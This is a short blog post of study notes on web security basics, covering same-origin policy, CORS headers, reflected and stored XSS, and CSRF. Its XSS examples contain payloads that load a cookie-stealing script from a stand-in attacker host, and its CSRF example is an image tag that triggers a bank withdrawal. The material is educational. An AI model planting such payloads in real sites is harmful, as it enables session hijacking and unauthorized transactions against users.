---
title: Web App Security Notes
date: 2015-08-09
tags:             ["security", "webapp", "csrf", "xss", "cors"]
categories:       "notes"
---


Here are some of my brief notes on the topic of web app security basics.  Most of the info is paraphrased from the wikipedia links in the References section.

## Same-origin policy and CORS
[Same-origin policy](https://en.wikipedia.org/wiki/Same-origin_policy) states that a web browser permits scripts on one web page to access data on another web page, but only if they have the same 'origin'.  Origin is a combination of the URI scheme(protocol), hostname, and port number.

In some cases, this policy is too restrictive (e.g. Sites that need to access assets from subdomains). There are a few ways to relax this policy.  One of them is [Cross-Origin Resource Sharing (CORS)](https://en.wikipedia.org/wiki/Cross-origin_resource_sharing).  

CORS adds some headers to create a simple protocol for allowing cross-origin requests. 
Browser first sends a request with an `Origin` HTTP header like so:

    Origin: http://www.mysite.com

The server than responds with an `Access-Control-Allow-Origin (ACAO)` header, which indicates which origin sites are allowed:

    Access-Control-Allow-Origin: http://www.othersite.com

ACAO can also look like this:

    Access-Control-Allow-Origin: *

However this is dangerous since it allows any site to access the resources on the server. The wildcard is only appropiate when the server's response can be completely public (e.g Google Fonts).

NOTE: SOP does not apply to the 'src' attribute of images, style, iframe, script elements, forms, etc.

## Cross Site Scripting
Cross Site Scripting (XSS) vulnerabilities enable attackers to inject client-side scripts into web pages viewed by other users.
It is one of the most common security vulnerabilites out there on the web.

### Reflected (non-persistent)
Non-persistent XSS vulnerability is the most common type.  These are caused by data provided by a client (from HTTP query params, HTML forms, etc.) is immediately loaded and parsed by server-side scripts, without sanitizing the data.

A classic example of this type of vulnerability is injecting a script in the search bar.  Usually the URL for a search page has the search term as a query parameter, e.g. `www.example.com/?q=cats`.  When the search results load, the page will show something along the lines of: "Search results for 'cats'".  If the site does not properly sanitize the query param input, then an attacker can add a payload like so:

    http://www.example.com/?q=cats<script%20src="http://mallorysevilsite.com/authstealer.js"

The attacker then sends this URL to the victim.  When the victim clicks on the link, "Search results for 'cats'" will be dipslayed, and in the background the script is processed.


### Persistent
In a persistent XSS attack, the attacker stores the payload on the server, and the malicious data is permanently displayed for all users to see (and potentially be a victim of). Example: Mallory creates an account on Bob's website, and finds a stored XSS vulnerability.  She learns that the comments section of a News story will display anything she posts.  And so she posts text like so: 

    This is an awesome story!<script src="http://mallorysevilsite.com/authstealer.js">
    
When another user, say Alice, visits the page with Mallory's comments, the script tag will run and Alice's authorization cookie will be stolen.


## Cross Site Request Forgery
[Cross Site Request Forgery (CSRF)](https://en.wikipedia.org/wiki/Cross-site_request_forgery) is a type of [confused deputy problem](https://en.wikipedia.org/wiki/Confused_deputy_problem).  The attack exploits the website's trust in the user's identity by giving unauthorized user commands to the website.  In essence, the 'confused deputy' is the Web Browser, since it is confused into misusing Alice's authority due to Mallory.

Example from wikipedia: 
Alice is browsing a chat forum when another user Mallory posted a message.  The message contains an `<img>` tag with a `src` referencing an action on Alice's bank website.

    <img src="http://somebank.com/withdraw?account=Alice&amount=10000000&for=Mallory">

If Alice's cookie contains the bank's authorization info, then when the browser loads the image, the transaction is authorized without Alice's approval.


The fundamental difference between XSS and CSRF is that XSS exploits user's trust in website, whereas CSRF exploits the trust the website has in the victim's Web browser.



# References
- https://en.wikipedia.org/wiki/Cross-site_request_forgery
- https://en.wikipedia.org/wiki/Same-origin_policy
- https://en.wikipedia.org/wiki/Cross-origin_resource_sharing
- http://schock.net/articles/2013/07/03/hosting-web-fonts-on-a-cdn-youre-going-to-need-some-cors/
